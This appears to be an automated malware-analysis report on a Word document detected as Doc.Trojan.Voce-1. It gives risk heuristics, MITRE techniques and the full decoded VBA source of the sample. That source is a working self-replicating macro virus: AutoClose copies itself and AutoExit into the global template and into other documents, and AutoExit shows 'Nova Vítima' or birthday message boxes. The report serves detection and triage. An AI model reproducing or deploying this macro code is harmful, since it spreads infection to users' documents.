MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoClose macro attempts to copy itself and the AutoExit macro to the global template, indicating an attempt to infect other documents. The AutoExit macro contains logic that would display a message box on July 28th. The presence of AutoClose and AutoExit macros suggests a macro-based infection vector, likely delivered via spearphishing.
Heuristics 4
-
ClamAV: Doc.Trojan.Voce-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Voce-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2053 bytes |
SHA-256: 2bb89821526ca8bb6cadd0ffd30320aebabe3c53f50fae92310c53cda96401dd |
|||
|
Detection
ClamAV:
Doc.Trojan.Voce-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Infectar
End Sub
Private Sub Infectar()
Dim Infectado
Infectado = VerificaVitima(0)
If Infectado = 0 Then
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose"
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExit", "Global:AutoExit"
Else
Infectado = VerificaVitima(1)
If Infectado = 0 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose"
WordBasic.MacroCopy "Global:AutoExit", WordBasic.[WindowName$]() + ":AutoExit"
End If
End If
End Sub
Private Function VerificaVitima(Contexto)
Dim QtdadeMacros
Dim Infectado
Dim MAP0997
Dim i
QtdadeMacros = WordBasic.CountMacros(Contexto)
Infectado = 0
MAP0997 = 0
If QtdadeMacros > 0 Then
For i = 1 To QtdadeMacros
If WordBasic.[MacroName$](i, Contexto) = "AutoClose" Or MAP0997 = 1 Then
MAP0997 = 1
If WordBasic.[MacroName$](i, Contexto) = "AutoExit" Then
Infectado = 1
End If
End If
Next
End If
VerificaVitima = Infectado
End Function
Attribute VB_Name = "AutoExit"
Public Sub MAIN()
Mensagem
End Sub
Private Sub Mensagem()
Dim Atraso
Dim fim
If (WordBasic.Day(WordBasic.Now()) = 28 And WordBasic.Month(WordBasic.Now()) = 7) Then
WordBasic.MsgBox "Parabéns para mim! ", "Meu aniversário", -8
Atraso = 3
Else
WordBasic.MsgBox "Fechando 2807M! ", "Nova Vítima", -8
Atraso = 1
End If
fim = WordBasic.Second(WordBasic.Now()) + 1
While WordBasic.Second(WordBasic.Now()) <> fim
Wend
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.